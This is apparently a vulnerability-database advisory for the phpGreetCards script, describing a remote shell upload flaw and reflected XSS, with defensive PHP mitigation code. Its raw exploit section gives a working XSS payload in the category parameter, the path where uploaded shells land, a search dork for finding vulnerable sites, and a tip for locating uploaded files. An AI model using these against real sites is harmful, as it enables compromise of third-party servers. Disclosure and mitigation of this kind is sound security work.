vendor:
phpGreetCards
by:
ahmadbady
7.5
CVSS
HIGH
Remote Shell Upload/XSS
79
CWE
Product Name: phpGreetCards
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

remote shell upload/xss

A vulnerability exists in the phpGreetCards script which allows an attacker to upload a malicious shell and execute arbitrary code. An XSS vulnerability also exists in the 'category' parameter of 'index.php?mode=select', which allows an attacker to inject arbitrary web script or HTML.

Mitigation:

Ensure that the userfiles folder is not accessible from the web, and that all user input is properly sanitized and validated.
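The mitigation above, worked through as an added PHP example that is not part of phpGreetCards: uploads are content-sniffed, renamed and stored outside the document root, served back through a handler rather than from the directory, and the category parameter is output-encoded. The directory path and the function names are assumptions.

```php
<?php
// Added example, not phpGreetCards code; UPLOAD_DIR and the function names are assumptions.
const UPLOAD_DIR = '/var/app/private_uploads';   // assumed path, outside the web root
const MAX_BYTES  = 2 * 1024 * 1024;
const ALLOWED    = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

/**
 * Validate one entry of $_FILES and move it under a server-chosen name.
 * Returns the stored file name; throws if any check fails.
 */
function store_card_image(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Sniff the real content; the client-supplied name and type are untrusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime]) || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an allowed image');
    }
    // Random name with a fixed image extension: no caller-chosen ".php" ends up on disk.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

/** Serve a stored image through PHP, so the directory itself is never exposed. */
function serve_card_image(string $name): void
{
    // Accept only names this application generated (rejects ../ and any other name).
    if (!preg_match('/^[a-f0-9]{32}\.(jpg|png|gif)$/', $name)) {
        http_response_code(404);
        return;
    }
    $path = UPLOAD_DIR . '/' . $name;
    header('Content-Type: ' . mime_content_type($path));
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}
/** Reflect the category parameter into HTML with output encoding. */
function category_heading(string $category): string
{
    return '<h2>' . htmlspecialchars($category, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</h2>';
}
```

Pair this with a web-server rule that denies script execution in any directory that must remain web-accessible, so a single misconfiguration does not undo the upload checks.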

Exploit-DB raw data:

...................................................................................................

****(remote shell upload/xss)****

script: phpGreetCards

***************************************************************************
download from: http://www.w2b.ru/download/phpGreetCards.zip

***************************************************************************
www.site.com/path/index.php?mode=select&category

shell: www.site.com/path/userfiles/number_shell.php
-----------------------------------------------------------------------------------------
dork:"powered by phpGreetCards"

If the userfiles folder is forbidden: after uploading the file, right-click the image and view its properties to see the file's address.

------------------------------------------------------------------------------------------
xss:
index.php?mode=select&category=>"><ScRiPt%20%0a%0d>alert(0)%3B</ScRiPt>
**************************************************


Author: ahmadbady

**************************************************

# milw0rm.com [2008-12-23]